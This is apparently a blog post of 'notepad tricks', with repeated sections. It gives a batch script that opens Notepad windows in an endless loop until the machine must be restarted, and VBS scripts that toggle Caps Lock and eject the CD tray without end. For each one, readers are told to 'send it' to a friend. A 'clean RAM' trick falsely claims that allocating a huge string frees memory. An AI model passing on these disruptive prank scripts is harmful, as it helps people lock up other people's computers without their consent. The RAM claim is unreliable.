GUYS TODAY I am telling to you some amazing tricks of
notpad.all tricks are very simple and you use these tricks without any
Knowledge.then guys use the tricks and make joy
Type the code in notepad as :
HOW TO INCREASE RAM-
RAM – Random Access Memory is one of the main component of
computer that is responsible for the process of the operating system. Since all
the Operating systems support Multiprocessing, hence require a good RAM speed.
Since all the current running processes are stored onto the
RAM, it slows the system speed. Sometimes the process which have executed but
are not required by the OS are stored on the RAM. So, we can remove or freeup
the RAM with unused junk data to Speedup the System or processing speed.
We can clean the RAM just by using a Notepad application.
This donot require any advanced software. The process to do so is as follows.
Open Notepad
Type
FreeMem=Space(64000000)
save it as “CleanRAM.vbs” on desktop
Note: Type the name of file along with inverted commas
Run the file and your RAM may be free.
Of course you can edit the code in the file for a greater
“cleaning-progress”.
For example:
FreeMem=Space(1280000000)
FreeMem=Space(2560000000)
FreeMem=Space(5120000000)
FreeMem=Space(10240000000)
by MHL
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “notepad.BAT” and send it.
Note: If you want to try it, then go ahead and when you
built this file double click to open it. But beware it slows your system and
you will be left with no other option than to restart, as this script opens
100’s of notepad window. So, If you want to try this than save all your work
and then run t
What this trick does is, when you run the following script
it starts blinking caps Lock light continuously. If you run this script twice
the rate of blink increases and alternatively NumLock light start to blink with
CapsLock.
Open Notepad and Type :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Caps.VBS” and send it to your friend. Double
Click it if you wanna see it working. Its a very funny Notepad Trick.
Note: Don’t worry when you try this crazy notepad trick. If
you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under
Processes end the process “wscript.exe”
Set oWMP = CreateObject(“WMPlayer.OCX.7“)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “cdtray.VBS” and send it.
Note: when you copy the above code and save it in notepad,
make the following changes to the first line of code as showed in below
screenshot
Notepad vb script to pop out cdromType the inverted Commas “
manually by typing through the keyboard.
Double Click it if you wanna see it working. Its a very
funny Notepad Trick.
Note: Don’t worry when this crazy notepad trick opens your
cd tray continuously. If you want to end this script simply Open Task
Manager(Alt+Ctrl+Delete). Under Processes end the process “wscript.exe
Yes, that’s right. In this post I am going to show you a
simple tip to join video of various formats like Mpeg, dat, mpg.. If you have
questions like
1. How to join various video files into one?
2. Join two video files?
3. How to Join videos taken from mobile phone?
Then, the best method to follow is shown below. You can join
your video files using just the windows Command Prompt. No need of any video
joining software’s.
Step 1: For example if you have 3 videos in your hardrive
root drive: video1.mpg, video2.mpg and video3.mpg just rename them to a, b, and
c (just the letter withoug the file extension).
Example:
ren video1.mpg a
ren video2.mpg b
ren video3.mpg c
Step 2: Open Command Prompt.
Start–>Run–>type “cmd”.
Step 3: Type the location of the drive like d: or C:
Step 4: Type: Copy /b a + b + c videoname.mpg
and click enter
Step 5: Now wait till you see: 1 files<s> copied.
Join video files using command prompt
And type exit and press enter. Thats it.You are done!
Note: If you want to join two files then those files must
have the same extension.
Alternative Method to Join multiple video files using
freeware software:
What is Easy Video Joiner?
Join video using freeware video joiner software
Easy Video Joiner can help you join multiple AVI, MPEG
(MPG), RM (Real Media) or WMV/ASF (Window Media) files into one large movie
file. You can add an unlimited number of video files as you like to the list
and easily rearrange their order if needed. With just a few mouse clicks, you
can enjoy your movie clips without interruption.
Key Features
1. Can join AVI files(*.avi, *.wav), MPEG-4 and DivX are
supported;
2. Can join MPEG files(*.mpeg, *.mpg, *.m2p, *.m1v, *.m2v,
*.mp3, *.mpga), MPEG-1 and MPEG-2 are supported;
3. Can join Real Media files(*.rm, *.ram);
4. Can join Windows Media files(*.wmv, *.asf, *.wma);
5. Not only join video files, but also join most audio files
with popular format(*.mp3, *.mpga, *.rm, *.wma, *.wav);
6. Very easy to use and very fast to work.
download link
You can even use HJSplit software to join video files or any
other files like mp3 too.
Description of HJSplit
HJSplit is a popular set of freeware file-splitting programs
created by Freebyte.com in collaboration with various programmers. HJSplit
supports many platforms. All versions are compatible with each other and allow
you to exchange files between these different platforms. E.g. a file split on
the Amiga can be joined on Windows 2000 and vice versa.
HOW TO INCREASE RAM
RAM – Random Access Memory is one of the main component of
computer that is responsible for the process of the operating system. Since all
the Operating systems support Multiprocessing, hence require a good RAM speed.
Since all the current running processes are stored onto the
RAM, it slows the system speed. Sometimes the process which have executed but
are not required by the OS are stored on the RAM. So, we can remove or freeup
the RAM with unused junk data to Speedup the System or processing speed.
We can clean the RAM just by using a Notepad application.
This donot require any advanced software. The process to do so is as follows.
Open Notepad
Type
FreeMem=Space(64000000)
save it as “CleanRAM.vbs” on desktop
Note: Type the name of file along with inverted commas
Run the file and your RAM may be free.
Of course you can edit the code in the file for a greater
“cleaning-progress”.
For example:
FreeMem=Space(1280000000)
FreeMem=Space(2560000000)
FreeMem=Space(5120000000)
FreeMem=Space(10240000000)
by MHL
No comments:
Post a Comment